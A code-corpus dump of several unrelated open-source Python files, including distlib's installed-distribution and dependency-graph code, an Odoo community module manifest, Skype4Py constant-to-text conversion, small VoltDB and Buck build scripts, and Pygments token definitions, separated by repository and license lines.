lines.append('%s=%s' % (key, path))
for ns in paths.get('namespace', ()):
lines.append('namespace=%s' % ns)
with codecs.open(shared_path, 'w', encoding='utf-8') as f:
f.write('\n'.join(lines))
return shared_path
def get_distinfo_resource(self, path):
if path not in DIST_FILES:
raise DistlibException('invalid path for a dist-info file: '
'%r at %r' % (path, self.path))
finder = resources.finder_for_path(self.path)
if finder is None:
raise DistlibException('Unable to get a finder for %s' % self.path)
return finder.find(path)
def get_distinfo_file(self, path):
"""
Returns a path located under the ``.dist-info`` directory. Returns a
string representing the path.
:parameter path: a ``'/'``-separated path relative to the
``.dist-info`` directory or an absolute path;
If *path* is an absolute path and doesn't start
with the ``.dist-info`` directory path,
a :class:`DistlibException` is raised
:type path: str
:rtype: str
"""
# Check if it is an absolute path # XXX use relpath, add tests
if path.find(os.sep) >= 0:
# it's an absolute path?
distinfo_dirname, path = path.split(os.sep)[-2:]
if distinfo_dirname != self.path.split(os.sep)[-1]:
raise DistlibException(
'dist-info file %r does not belong to the %r %s '
'distribution' % (path, self.name, self.version))
# The file must be relative
if path not in DIST_FILES:
raise DistlibException('invalid path for a dist-info file: '
'%r at %r' % (path, self.path))
return os.path.join(self.path, path)
def list_distinfo_files(self):
"""
Iterates over the ``RECORD`` entries and returns paths for each line if
the path is pointing to a file located in the ``.dist-info`` directory
or one of its subdirectories.
:returns: iterator of paths
"""
base = os.path.dirname(self.path)
for path, checksum, size in self._get_records():
# XXX add separator or use real relpath algo
if not os.path.isabs(path):
path = os.path.join(base, path)
if path.startswith(self.path):
yield path
def __eq__(self, other):
return (isinstance(other, InstalledDistribution) and
self.path == other.path)
# See http://docs.python.org/reference/datamodel#object.__hash__
__hash__ = object.__hash__
class EggInfoDistribution(BaseInstalledDistribution):
"""Created with the *path* of the ``.egg-info`` directory or file provided
to the constructor. It reads the metadata contained in the file itself, or
if the given path happens to be a directory, the metadata is read from the
file ``PKG-INFO`` under that directory."""
requested = True # as we have no way of knowing, assume it was
shared_locations = {}
def __init__(self, path, env=None):
def set_name_and_version(s, n, v):
s.name = n
s.key = n.lower() # for case-insensitive comparisons
s.version = v
self.path = path
self.dist_path = env
if env and env._cache_enabled and path in env._cache_egg.path:
metadata = env._cache_egg.path[path].metadata
set_name_and_version(self, metadata.name, metadata.version)
else:
metadata = self._get_metadata(path)
# Need to be set before caching
set_name_and_version(self, metadata.name, metadata.version)
if env and env._cache_enabled:
env._cache_egg.add(self)
super(EggInfoDistribution, self).__init__(metadata, path, env)
def _get_metadata(self, path):
requires = None
def parse_requires_data(data):
"""Create a list of dependencies from a requires.txt file.
*data*: the contents of a setuptools-produced requires.txt file.
"""
reqs = []
lines = data.splitlines()
for line in lines:
line = line.strip()
if line.startswith('['):
logger.warning('Unexpected line: quitting requirement scan: %r',
line)
break
r = parse_requirement(line)
if not r:
logger.warning('Not recognised as a requirement: %r', line)
continue
if r.extras:
logger.warning('extra requirements in requires.txt are '
'not supported')
if not r.constraints:
reqs.append(r.name)
else:
cons = ', '.join('%s%s' % c for c in r.constraints)
reqs.append('%s (%s)' % (r.name, cons))
return reqs
def parse_requires_path(req_path):
"""Create a list of dependencies from a requires.txt file.
*req_path*: the path to a setuptools-produced requires.txt file.
"""
reqs = []
try:
with codecs.open(req_path, 'r', 'utf-8') as fp:
reqs = parse_requires_data(fp.read())
except IOError:
pass
return reqs
if path.endswith('.egg'):
if os.path.isdir(path):
meta_path = os.path.join(path, 'EGG-INFO', 'PKG-INFO')
metadata = Metadata(path=meta_path, scheme='legacy')
req_path = os.path.join(path, 'EGG-INFO', 'requires.txt')
requires = parse_requires_path(req_path)
else:
# FIXME handle the case where zipfile is not available
zipf = zipimport.zipimporter(path)
fileobj = StringIO(
zipf.get_data('EGG-INFO/PKG-INFO').decode('utf8'))
metadata = Metadata(fileobj=fileobj, scheme='legacy')
try:
data = zipf.get_data('EGG-INFO/requires.txt')
requires = parse_requires_data(data.decode('utf-8'))
except IOError:
requires = None
elif path.endswith('.egg-info'):
if os.path.isdir(path):
req_path = os.path.join(path, 'requires.txt')
requires = parse_requires_path(req_path)
path = os.path.join(path, 'PKG-INFO')
metadata = Metadata(path=path, scheme='legacy')
else:
raise DistlibException('path must end with .egg-info or .egg, '
'got %r' % path)
if requires:
metadata.add_requirements(requires)
return metadata
def __repr__(self):
return '<EggInfoDistribution %r %s at %r>' % (
self.name, self.version, self.path)
def __str__(self):
return "%s %s" % (self.name, self.version)
def check_installed_files(self):
"""
Checks that the hashes and sizes of the files in ``RECORD`` are
matched by the files themselves. Returns a (possibly empty) list of
mismatches. Each entry in the mismatch list will be a tuple consisting
of the path, 'exists', 'size' or 'hash' according to what didn't match
(existence is checked first, then size, then hash), the expected
value and the actual value.
"""
mismatches = []
record_path = os.path.join(self.path, 'installed-files.txt')
if os.path.exists(record_path):
for path, _, _ in self.list_installed_files():
if path == record_path:
continue
if not os.path.exists(path):
mismatches.append((path, 'exists', True, False))
return mismatches
def list_installed_files(self):
"""
Iterates over the ``installed-files.txt`` entries and returns a tuple
``(path, hash, size)`` for each line.
:returns: a list of (path, hash, size)
"""
def _md5(path):
f = open(path, 'rb')
try:
content = f.read()
finally:
f.close()
return hashlib.md5(content).hexdigest()
def _size(path):
return os.stat(path).st_size
record_path = os.path.join(self.path, 'installed-files.txt')
result = []
if os.path.exists(record_path):
with codecs.open(record_path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
p = os.path.normpath(os.path.join(self.path, line))
# "./" is present as a marker between installed files
# and installation metadata files
if not os.path.exists(p):
logger.warning('Non-existent file: %s', p)
if p.endswith(('.pyc', '.pyo')):
continue
#otherwise fall through and fail
if not os.path.isdir(p):
result.append((p, _md5(p), _size(p)))
result.append((record_path, None, None))
return result
def list_distinfo_files(self, absolute=False):
"""
Iterates over the ``installed-files.txt`` entries and returns paths for
each line if the path is pointing to a file located in the
``.egg-info`` directory or one of its subdirectories.
:parameter absolute: If *absolute* is ``True``, each returned path is
transformed into a local absolute path. Otherwise the
raw value from ``installed-files.txt`` is returned.
:type absolute: boolean
:returns: iterator of paths
"""
record_path = os.path.join(self.path, 'installed-files.txt')
skip = True
with codecs.open(record_path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
if line == './':
skip = False
continue
if not skip:
p = os.path.normpath(os.path.join(self.path, line))
if p.startswith(self.path):
if absolute:
yield p
else:
yield line
def __eq__(self, other):
return (isinstance(other, EggInfoDistribution) and
self.path == other.path)
# See http://docs.python.org/reference/datamodel#object.__hash__
__hash__ = object.__hash__
new_dist_class = InstalledDistribution
old_dist_class = EggInfoDistribution
class DependencyGraph(object):
"""
Represents a dependency graph between distributions.
The dependency relationships are stored in an ``adjacency_list`` that maps
distributions to a list of ``(other, label)`` tuples where ``other``
is a distribution and the edge is labeled with ``label`` (i.e. the version
specifier, if such was provided). Also, for more efficient traversal, for
every distribution ``x``, a list of predecessors is kept in
``reverse_list[x]``. An edge from distribution ``a`` to
distribution ``b`` means that ``a`` depends on ``b``. If any missing
dependencies are found, they are stored in ``missing``, which is a
dictionary that maps distributions to a list of requirements that were not
provided by any other distributions.
"""
def __init__(self):
self.adjacency_list = {}
self.reverse_list = {}
self.missing = {}
def add_distribution(self, distribution):
"""Add the *distribution* to the graph.
:type distribution: :class:`distutils2.database.InstalledDistribution`
or :class:`distutils2.database.EggInfoDistribution`
"""
self.adjacency_list[distribution] = []
self.reverse_list[distribution] = []
#self.missing[distribution] = []
def add_edge(self, x, y, label=None):
"""Add an edge from distribution *x* to distribution *y* with the given
*label*.
:type x: :class:`distutils2.database.InstalledDistribution` or
:class:`distutils2.database.EggInfoDistribution`
:type y: :class:`distutils2.database.InstalledDistribution` or
:class:`distutils2.database.EggInfoDistribution`
:type label: ``str`` or ``None``
"""
self.adjacency_list[x].append((y, label))
# multiple edges are allowed, so be careful
if x not in self.reverse_list[y]:
self.reverse_list[y].append(x)
def add_missing(self, distribution, requirement):
"""
Add a missing *requirement* for the given *distribution*.
:type distribution: :class:`distutils2.database.InstalledDistribution`
or :class:`distutils2.database.EggInfoDistribution`
:type requirement: ``str``
"""
logger.debug('%s missing %r', distribution, requirement)
self.missing.setdefault(distribution, []).append(requirement)
def _repr_dist(self, dist):
return '%s %s' % (dist.name, dist.version)
def repr_node(self, dist, level=1):
"""Prints only a subgraph"""
output = [self._repr_dist(dist)]
for other, label in self.adjacency_list[dist]:
dist = self._repr_dist(other)
if label is not None:
dist = '%s [%s]' % (dist, label)
output.append(' ' * level + str(dist))
suboutput = self.repr_node(other, level + 1)
subs = suboutput.split('\n')
output.extend(subs[1:])
return '\n'.join(output)
def to_dot(self, f, skip_disconnected=True):
"""Writes a DOT output for the graph to the provided file *f*.
If *skip_disconnected* is set to ``True``, then all distributions
that are not dependent on any other distribution are skipped.
:type f: has to support ``file``-like operations
:type skip_disconnected: ``bool``
"""
disconnected = []
f.write("digraph dependencies {\n")
for dist, adjs in self.adjacency_list.items():
if len(adjs) == 0 and not skip_disconnected:
disconnected.append(dist)
for other, label in adjs:
if not label is None:
f.write('"%s" -> "%s" [label="%s"]\n' %
(dist.name, other.name, label))
else:
f.write('"%s" -> "%s"\n' % (dist.name, other.name))
if not skip_disconnected and len(disconnected) > 0:
f.write('subgraph disconnected {\n')
f.write('label = "Disconnected"\n')
f.write('bgcolor = red\n')
for dist in disconnected:
f.write('"%s"' % dist.name)
f.write('\n')
f.write('}\n')
f.write('}\n')
def topological_sort(self):
"""
Perform a topological sort of the graph.
:return: A tuple, the first element of which is a topologically sorted
list of distributions, and the second element of which is a
list of distributions that cannot be sorted because they have
circular dependencies and so form a cycle.
"""
result = []
# Make a shallow copy of the adjacency list
alist = {}
for k, v in self.adjacency_list.items():
alist[k] = v[:]
while True:
# See what we can remove in this run
to_remove = []
for k, v in list(alist.items())[:]:
if not v:
to_remove.append(k)
del alist[k]
if not to_remove:
# What's left in alist (if anything) is a cycle.
break
# Remove from the adjacency list of others
for k, v in alist.items():
alist[k] = [(d, r) for d, r in v if d not in to_remove]
logger.debug('Moving to result: %s',
['%s (%s)' % (d.name, d.version) for d in to_remove])
result.extend(to_remove)
return result, list(alist.keys())
def __repr__(self):
"""Representation of the graph"""
output = []
for dist, adjs in self.adjacency_list.items():
output.append(self.repr_node(dist))
return '\n'.join(output)
def make_graph(dists, scheme='default'):
"""Makes a dependency graph from the given distributions.
:parameter dists: a list of distributions
:type dists: list of :class:`distutils2.database.InstalledDistribution` and
:class:`distutils2.database.EggInfoDistribution` instances
:rtype: a :class:`DependencyGraph` instance
"""
scheme = get_scheme(scheme)
graph = DependencyGraph()
provided = {} # maps names to lists of (version, dist) tuples
# first, build the graph and find out what's provided
for dist in dists:
graph.add_distribution(dist)
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
provided.setdefault(name, []).append((version, dist))
# now make the edges
for dist in dists:
requires = (dist.run_requires | dist.meta_requires |
dist.build_requires | dist.dev_requires)
for req in requires:
try:
matcher = scheme.matcher(req)
except UnsupportedVersionError:
# XXX compat-mode if cannot read the version
logger.warning('could not read version %r - using name only',
req)
name = req.split()[0]
matcher = scheme.matcher(name)
name = matcher.key # case-insensitive
matched = False
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
graph.add_edge(dist, provider, req)
matched = True
break
if not matched:
graph.add_missing(dist, req)
return graph
def get_dependent_dists(dists, dist):
"""Recursively generate a list of distributions from *dists* that are
dependent on *dist*.
:param dists: a list of distributions
:param dist: a distribution, member of *dists* for which we are interested
"""
if dist not in dists:
raise DistlibException('given distribution %r is not a member '
'of the list' % dist.name)
graph = make_graph(dists)
dep = [dist] # dependent distributions
todo = graph.reverse_list[dist] # list of nodes we should inspect
while todo:
d = todo.pop()
dep.append(d)
for succ in graph.reverse_list[d]:
if succ not in dep:
todo.append(succ)
dep.pop(0) # remove dist from dep, was there to prevent infinite loops
return dep
def get_required_dists(dists, dist):
"""Recursively generate a list of distributions from *dists* that are
required by *dist*.
:param dists: a list of distributions
:param dist: a distribution, member of *dists* for which we are interested
"""
if dist not in dists:
raise DistlibException('given distribution %r is not a member '
'of the list' % dist.name)
graph = make_graph(dists)
req = [] # required distributions
todo = graph.adjacency_list[dist] # list of nodes we should inspect
while todo:
d = todo.pop()[0]
req.append(d)
for pred in graph.adjacency_list[d]:
if pred not in req:
todo.append(pred)
return req
def make_dist(name, version, **kwargs):
"""
A convenience method for making a dist given just a name and version.
"""
summary = kwargs.pop('summary', 'Placeholder for summary')
md = Metadata(**kwargs)
md.name = name
md.version = version
md.summary = summary or 'Placeholder for summary'
return Distribution(md)
|
gpl-3.0
|
open-synergy/vertical-community
|
__unreviewed__/community/__openerp__.py
|
4
|
2022
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author: Yannick Buron. Copyright Yannick Buron
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Odoo for Communities',
'version': '1.0',
'category': 'Community',
'author': 'Yannick Buron',
'license': 'AGPL-3',
'description': """
Odoo for Communities
====================
Use your Odoo to manage communities.
------------------------------------
* Install official module useful for communities
* Manage community access from user simplified form
* Add a custom form to install module for managing community
""",
'website': 'https://github.com/YannickB/community-management',
'depends': [
'base',
'base_community',
'calendar',
'document',
'gamification',
'im_chat',
'im_livechat',
'mail_holacracy',
'membership',
'membership_users',
'portal',
'website',
'website_mail_group',
],
'data': [
'data/community_data.xml',
'community_view.xml',
'security/community_security.xml',
'res_config_view.xml'
],
'demo': ['data/community_demo.xml'],
'installable': True,
'application': True,
}
|
agpl-3.0
|
djw8605/condor
|
src/condor_contrib/condor_pigeon/src/condor_pigeon_client/skype_linux_tools/Skype4Py/conversion.py
|
10
|
15351
|
'''Conversion between constants and text.
'''
import enums
import os
# Following code is needed when building executable files using py2exe.
# Together with the Languages.__init__ it makes sure that all languages
# are included in the package built by py2exe. The tool lookes just at
# the imports, it ignores the 'if' statement.
#
# More about py2exe: http://www.py2exe.org/
if False:
import Languages
class IConversion(object):
'''Allows conversion between constants and text. Access using L{ISkype.Convert<skype.ISkype.Convert>}.
'''
def __init__(self, Skype):
'''__init__.
@param Skype: Skype object.
@type Skype: L{ISkype}
'''
self._Language = u''
self._Module = None
self._SetLanguage('en')
def _TextTo(self, prefix, value):
enum = [z for z in [(y, getattr(enums, y)) for y in [x for x in dir(enums) if x.startswith(prefix)]] if z[1] == value]
if enum:
return str(value)
raise ValueError('Bad text')
def _ToText(self, prefix, value):
enum = [z for z in [(y, getattr(enums, y)) for y in [x for x in dir(enums) if x.startswith(prefix)]] if z[1] == value]
if enum:
try:
return unicode(getattr(self._Module, enum[0][0]))
except AttributeError:
pass
raise ValueError('Bad identifier')
def AttachmentStatusToText(self, Status):
'''Returns attachment status as text.
@param Status: Attachment status.
@type Status: L{Attachment status<enums.apiAttachUnknown>}
@return: Text describing the attachment status.
@rtype: unicode
'''
return self._ToText('api', Status)
def BuddyStatusToText(self, Status):
'''Returns buddy status as text.
@param Status: Buddy status.
@type Status: L{Buddy status<enums.budUnknown>}
@return: Text describing the buddy status.
@rtype: unicode
'''
return self._ToText('bud', Status)
def CallFailureReasonToText(self, Reason):
'''Returns failure reason as text.
@param Reason: Call failure reason.
@type Reason: L{Call failure reason<enums.cfrUnknown>}
@return: Text describing the call failure reason.
@rtype: unicode
'''
return self._ToText('cfr', Reason)
def CallStatusToText(self, Status):
'''Returns call status as text.
@param Status: Call status.
@type Status: L{Call status<enums.clsUnknown>}
@return: Text describing the call status.
@rtype: unicode
'''
return self._ToText('cls', Status)
def CallTypeToText(self, Type):
'''Returns call type as text.
@param Type: Call type.
@type Type: L{Call type<enums.cltUnknown>}
@return: Text describing the call type.
@rtype: unicode
'''
return self._ToText('clt', Type)
def CallVideoSendStatusToText(self, Status):
'''Returns call video send status as text.
@param Status: Call video send status.
@type Status: L{Call video send status<enums.vssUnknown>}
@return: Text describing the call video send status.
@rtype: unicode
'''
return self._ToText('vss', Status)
def CallVideoStatusToText(self, Status):
'''Returns call video status as text.
@param Status: Call video status.
@type Status: L{Call video status<enums.cvsUnknown>}
@return: Text describing the call video status.
@rtype: unicode
'''
return self._ToText('cvs', Status)
def ChatLeaveReasonToText(self, Reason):
'''Returns leave reason as text.
@param Reason: Chat leave reason.
@type Reason: L{Chat leave reason<enums.leaUnknown>}
@return: Text describing the chat leave reason.
@rtype: unicode
'''
return self._ToText('lea', Reason)
def ChatMessageStatusToText(self, Status):
'''Returns message status as text.
@param Status: Chat message status.
@type Status: L{Chat message status<enums.cmsUnknown>}
@return: Text describing the chat message status.
@rtype: unicode
'''
return self._ToText('cms', Status)
def ChatMessageTypeToText(self, Type):
'''Returns message type as text.
@param Type: Chat message type.
@type Type: L{Chat message type<enums.cmeUnknown>}
@return: Text describing the chat message type.
@rtype: unicode
'''
return self._ToText('cme', Type)
def ChatStatusToText(self, Status):
'''Returns chatr status as text.
@param Status: Chat status.
@type Status: L{Chat status<enums.chsUnknown>}
@return: Text describing the chat status.
@rtype: unicode
'''
return self._ToText('chs', Status)
def ConnectionStatusToText(self, Status):
'''Returns connection status as text.
@param Status: Connection status.
@type Status: L{Connection status<enums.conUnknown>}
@return: Text describing the connection status.
@rtype: unicode
'''
return self._ToText('con', Status)
def GroupTypeToText(self, Type):
'''Returns group type as text.
@param Type: Group type.
@type Type: L{Group type<enums.grpUnknown>}
@return: Text describing the group type.
@rtype: unicode
'''
return self._ToText('grp', Type)
def OnlineStatusToText(self, Status):
'''Returns online status as text.
@param Status: Online status.
@type Status: L{Online status<enums.olsUnknown>}
@return: Text describing the online status.
@rtype: unicode
'''
return self._ToText('ols', Status)
def SmsMessageStatusToText(self, Status):
'''Returns SMS message status as text.
@param Status: SMS message status.
@type Status: L{SMS message status<enums.smsMessageStatusUnknown>}
@return: Text describing the SMS message status.
@rtype: unicode
'''
return self._ToText('smsMessageStatus', Status)
def SmsMessageTypeToText(self, Type):
'''Returns SMS message type as text.
@param Type: SMS message type.
@type Type: L{SMS message type<enums.smsMessageTypeUnknown>}
@return: Text describing the SMS message type.
@rtype: unicode
'''
return self._ToText('smsMessageType', Type)
def SmsTargetStatusToText(self, Status):
'''Returns SMS target status as text.
@param Status: SMS target status.
@type Status: L{SMS target status<enums.smsTargetStatusUnknown>}
@return: Text describing the SMS target status.
@rtype: unicode
'''
return self._ToText('smsTargetStatus', Status)
def TextToAttachmentStatus(self, Text):
'''Returns attachment status code.
@param Text: Text, one of 'UNKNOWN', 'SUCCESS', 'PENDING_AUTHORIZATION', 'REFUSED',
'NOT_AVAILABLE', 'AVAILABLE'.
@type Text: unicode
@return: Attachment status.
@rtype: L{Attachment status<enums.apiAttachUnknown>}
'''
conv = {'UNKNOWN': enums.apiAttachUnknown,
'SUCCESS': enums.apiAttachSuccess,
'PENDING_AUTHORIZATION': enums.apiAttachPendingAuthorization,
'REFUSED': enums.apiAttachRefused,
'NOT_AVAILABLE': enums.apiAttachNotAvailable,
'AVAILABLE': enums.apiAttachAvailable}
try:
return self._TextTo('api', conv[Text.upper()])
except KeyError:
raise ValueError('Bad text')
def TextToBuddyStatus(self, Text):
'''Returns buddy status code.
@param Text: Text, one of 'UNKNOWN', 'NEVER_BEEN_FRIEND', 'DELETED_FRIEND',
'PENDING_AUTHORIZATION', 'FRIEND'.
@type Text: unicode
@return: Buddy status.
@rtype: L{Buddy status<enums.budUnknown>}
'''
conv = {'UNKNOWN': enums.budUnknown,
'NEVER_BEEN_FRIEND': enums.budNeverBeenFriend,
'DELETED_FRIEND': enums.budDeletedFriend,
'PENDING_AUTHORIZATION': enums.budPendingAuthorization,
'FRIEND': enums.budFriend}
try:
return self._TextTo('bud', conv[Text.upper()])
except KeyError:
raise ValueError('Bad text')
def TextToCallStatus(self, Text):
'''Returns call status code.
@param Text: Text, one of L{Call status<enums.clsUnknown>}.
@type Text: unicode
@return: Call status.
@rtype: L{Call status<enums.clsUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('cls', Text)
def TextToCallType(self, Text):
'''Returns call type code.
@param Text: Text, one of L{Call type<enums.cltUnknown>}.
@type Text: unicode
@return: Call type.
@rtype: L{Call type<enums.cltUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('clt', Text)
def TextToChatMessageStatus(self, Text):
'''Returns message status code.
@param Text: Text, one of L{Chat message status<enums.cmsUnknown>}.
@type Text: unicode
@return: Chat message status.
@rtype: L{Chat message status<enums.cmsUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('cms', Text)
def TextToChatMessageType(self, Text):
'''Returns message type code.
@param Text: Text, one of L{Chat message type<enums.cmeUnknown>}.
@type Text: unicode
@return: Chat message type.
@rtype: L{Chat message type<enums.cmeUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('cme', Text)
def TextToConnectionStatus(self, Text):
'''Retunes connection status code.
@param Text: Text, one of L{Connection status<enums.conUnknown>}.
@type Text: unicode
@return: Connection status.
@rtype: L{Connection status<enums.conUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('con', Text)
def TextToGroupType(self, Text):
'''Returns group type code.
@param Text: Text, one of L{Group type<enums.grpUnknown>}.
@type Text: unicode
@return: Group type.
@rtype: L{Group type<enums.grpUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('grp', Text)
def TextToOnlineStatus(self, Text):
'''Returns online status code.
@param Text: Text, one of L{Online status<enums.olsUnknown>}.
@type Text: unicode
@return: Online status.
@rtype: L{Online status<enums.olsUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('ols', Text)
def TextToUserSex(self, Text):
'''Returns user sex code.
@param Text: Text, one of L{User sex<enums.usexUnknown>}.
@type Text: unicode
@return: User sex.
@rtype: L{User sex<enums.usexUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('usex', Text)
def TextToUserStatus(self, Text):
'''Returns user status code.
@param Text: Text, one of L{User status<enums.cusUnknown>}.
@type Text: unicode
@return: User status.
@rtype: L{User status<enums.cusUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('cus', Text)
def TextToVoicemailStatus(self, Text):
'''Returns voicemail status code.
@param Text: Text, one of L{Voicemail status<enums.vmsUnknown>}.
@type Text: unicode
@return: Voicemail status.
@rtype: L{Voicemail status<enums.vmsUnknown>}
@note: Currently, this method only checks if the given string is one of the allowed ones
and returns it or raises a C{ValueError}.
'''
return self._TextTo('vms', Text)
def UserSexToText(self, Sex):
'''Returns user sex as text.
@param Sex: User sex.
@type Sex: L{User sex<enums.usexUnknown>}
@return: Text describing the user sex.
@rtype: unicode
'''
return self._ToText('usex', Sex)
def UserStatusToText(self, Status):
'''Returns user status as text.
@param Status: User status.
@type Status: L{User status<enums.cusUnknown>}
@return: Text describing the user status.
@rtype: unicode
'''
return self._ToText('cus', Status)
def VoicemailFailureReasonToText(self, Reason):
'''Returns voicemail failure reason as text.
@param Reason: Voicemail failure reason.
@type Reason: L{Voicemail failure reason<enums.vmrUnknown>}
@return: Text describing the voicemail failure reason.
@rtype: unicode
'''
return self._ToText('vmr', Reason)
def VoicemailStatusToText(self, Status):
'''Returns voicemail status as text.
@param Status: Voicemail status.
@type Status: L{Voicemail status<enums.vmsUnknown>}
@return: Text describing the voicemail status.
@rtype: unicode
'''
return self._ToText('vms', Status)
def VoicemailTypeToText(self, Type):
'''Returns voicemail type as text.
@param Type: Voicemail type.
@type Type: L{Voicemail type<enums.vmtUnknown>}
@return: Text describing the voicemail type.
@rtype: unicode
'''
return self._ToText('vmt', Type)
def _GetLanguage(self):
return self._Language
def _SetLanguage(self, Language):
try:
self._Module = __import__('Languages.%s' % Language, globals(), locals(), ['Languages'])
self._Language = unicode(Language)
except ImportError:
raise ValueError('Unknown language: %s' % Language)
Language = property(_GetLanguage, _SetLanguage,
doc='''Language used for all "ToText" conversions.
Currently supported languages: ar, bg, cs, cz, da, de, el, en, es, et, fi, fr, he, hu, it, ja, ko,
lt, lv, nl, no, pl, pp, pt, ro, ru, sv, tr, x1.
@type: unicode
''')
|
apache-2.0
|
wwgong/CVoltDB
|
tests/scripts/profctl.py
|
4
|
1385
|
#!/usr/bin/env python
# -*- coding: utf-8
# This file is part of VoltDB.
# Copyright (C) 2008-2011 VoltDB Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import sys
from voltdbclient import *
client = FastSerializer("localhost", 21212)
proc = VoltProcedure(client, "@ProfCtl", [FastSerializer.VOLTTYPE_STRING])
response = proc.call([sys.argv[1]])
for x in response.tables:
print x
|
gpl-3.0
|
Distrotech/buck
|
programs/gen_buck_info.py
|
11
|
1482
|
import errno
import os
import json
import sys
import time
import buck_version
def main(argv):
# Locate the root of the buck repo. We'll need to be there to
# generate the buck version UID.
path = os.getcwd()
while not os.path.exists(os.path.join(path, '.buckconfig')):
path = os.path.dirname(path)
if os.path.exists(os.path.join(path, '.git')):
# Attempt to create a "clean" version, but fall back to a "dirty"
# one if need be.
version = buck_version.get_clean_buck_version(path)
timestamp = -1
if version is None:
version = buck_version.get_dirty_buck_version(path)
else:
timestamp = buck_version.get_git_revision_timestamp(path)
else:
# We're building outside a git repo. Check for the special
# .buckrelease file created by the release process.
try:
with open(os.path.join(path, '.buckrelease')) as f:
timestamp = int(os.fstat(f.fileno()).st_mtime)
version = f.read().strip()
except IOError, e:
if e.errno == errno.ENOENT:
# No .buckrelease file. Do the best that we can.
version = '(unknown version)'
timestamp = int(time.time())
else:
raise e
json.dump(
{'version': version, 'timestamp': timestamp},
sys.stdout,
sort_keys=True,
indent=2)
sys.exit(main(sys.argv))
|
apache-2.0
|
3dfxsoftware/cbss-addons
|
stock_picking_validate_past/__init__.py
|
1
|
1292
|
# -*- encoding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2010 Vauxoo - http://www.vauxoo.com/
# All Rights Reserved.
# info Vauxoo ([email protected])
############################################################################
# Coded by: Luis Torres ([email protected])
############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import stock
import stock_partial_move
|
gpl-2.0
|
thinkwhale/MyTakeOnQuotes
|
node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-2.7/pygments/token.py
|
365
|
5662
|
# -*- coding: utf-8 -*-
"""
pygments.token
~~~~~~~~~~~~~~
Basic token types and the standard tokens.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
class _TokenType(tuple):
parent = None
def split(self):
buf = []
node = self
while node is not None:
buf.append(node)
node = node.parent
buf.reverse()
return buf
def __init__(self, *args):
# no need to call super.__init__
self.subtypes = set()
def __contains__(self, val):
return self is val or (
type(val) is self.__class__ and
val[:len(self)] == self
)
def __getattr__(self, val):
if not val or not val[0].isupper():
return tuple.__getattribute__(self, val)
new = _TokenType(self + (val,))
setattr(self, val, new)
self.subtypes.add(new)
new.parent = self
return new
def __repr__(self):
return 'Token' + (self and '.' or '') + '.'.join(self)
Token = _TokenType()
# Special token types
Text = Token.Text
Whitespace = Text.Whitespace
Error = Token.Error
# Text that doesn't belong to this lexer (e.g. HTML in PHP)
Other = Token.Other
# Common token types for source code
Keyword = Token.Keyword
Name = Token.Name
Literal = Token.Literal
String = Literal.String
Number = Literal.Number
Punctuation = Token.Punctuation
Operator = Token.Operator
Comment = Token.Comment
# Generic types for non-source code
Generic = Token.Generic
# String and some others are not direct childs of Token.
# alias them:
Token.Token = Token
Token.String = String
Token.Number = Number
